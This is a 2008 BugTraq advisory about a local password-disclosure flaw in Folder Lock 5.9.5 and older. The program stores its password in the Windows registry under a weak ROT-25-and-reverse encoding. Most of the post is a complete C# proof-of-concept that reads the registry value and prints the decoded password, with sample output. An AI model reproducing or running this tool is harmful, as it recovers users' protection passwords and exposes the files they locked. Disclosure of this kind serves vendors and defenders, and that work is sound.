BugTraq
Folder Lock <= 5.9.5 Local Password Information Disclosure Aug 20 2008 02:11AM
glafkos infosec org uk
/*
* Folder Lock <= 5.9.5 Local Password Information Disclosure
*
* Author(s): Charalambous Glafkos
* George Nicolaou
* Date: June 19, 2008
* Site: http://www.astalavista.com
* Mail: glafkos (at) astalavista (dot) com [email concealed]
* ishtus (at) astalavista (dot) com [email concealed]
*
* Synopsis: Folder Lock 5.9.5 and older versions are prone to local information-disclosure vulnerability.
* Successfully exploiting this issue allows attackers to obtain potentially sensitive information that may aid in further attacks.
* The security issue is caused due to the application storing access credentials within the Windows registry key:
* (HKEY_CURRENT_USER\Software\Microsoft\Windows\QualityControl) without proper encryption.
* This can be exploited to disclose the encrypted _pack password of the user which is ROT-25 and reversed.
*
* Sample Output:
*
* ASTALAVISTA the hacking & security community
* Folder Lock <= 5.9.5 Decrypter v2.0
* ---------------------------------
* Encrypted Password: :3<k_^62`4T-
* Decrypted Password: ,S3_15]^j;29
*
*/

using System;
using System.Text;
using System.IO;
using System.Threading;
using Microsoft.Win32;

namespace getRegistryValue
{
class getValue
{
static void Main()
{
getValue details = new getValue();
Console.WriteLine("\nASTALAVISTA the hacking & security community\n\n");
Console.WriteLine("Folder Lock <= 5.9.5 Decrypter v2.0");
Console.WriteLine("---------------------------------");
String strFL = details.getFL();
Console.WriteLine(strFL);
Thread.Sleep(5000);
}

private string getFL()
{
RegistryKey FLKey = Registry.CurrentUser;
FLKey = FLKey.OpenSubKey(@"Software\Microsoft\Windows\QualityControl", false);
String _pack = FLKey.GetValue("_pack").ToString();
String strFL = "Encrypted Password: " + _pack.Replace("~", "") + "\nDecrypted Password: " + Reverse(Rotate(_pack.Replace("~", ""))) + "\n";
return strFL;
}

public string Reverse(string x)
{
char[] charArray = new char[x.Length];
int len = x.Length - 1;
for (int i = 0; i <= len; i++)
charArray[i] = x[len - i];
return new string(charArray);
}

public static string Rotate(string toRotate)
{
char[] charArray = toRotate.ToCharArray();
for (int i = 0; i < charArray.Length; i++)
{
int thisInt = (int)charArray[i];
if (thisInt >= 65 && thisInt <= 91)
{
thisInt += 25;
if (thisInt >= 91)
{
thisInt -= 26;
}
}

if (thisInt >= 92 && thisInt <= 96)
{
thisInt += 25;
if (thisInt >= 96)
{
thisInt -= 26;
}
}

if (thisInt >= 32 && thisInt <= 47)
{
thisInt += 25;

if (thisInt >= 47)
{
thisInt -= 26;
}
}

if (thisInt >= 48 && thisInt <= 57)
{
thisInt += 25;

if (thisInt >= 57)
{
thisInt -= 26;
}
}

if (thisInt >= 58 && thisInt <= 64)
{
thisInt += 25;

if (thisInt >= 64)
{
thisInt -= 26;
}
}

if (thisInt >= 97 && thisInt <= 123)
{
thisInt += 25;

if (thisInt >= 123)
{
thisInt -= 26;
}
}

charArray[i] = (char)thisInt;
}
return new string(charArray);
}
}
}

Best Regards,
Charalambous Glafkos ( nowayout )
__________________________________________
ASTALAVISTA - the hacking & security community
www.astalavista.com
www.astalavista.net

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus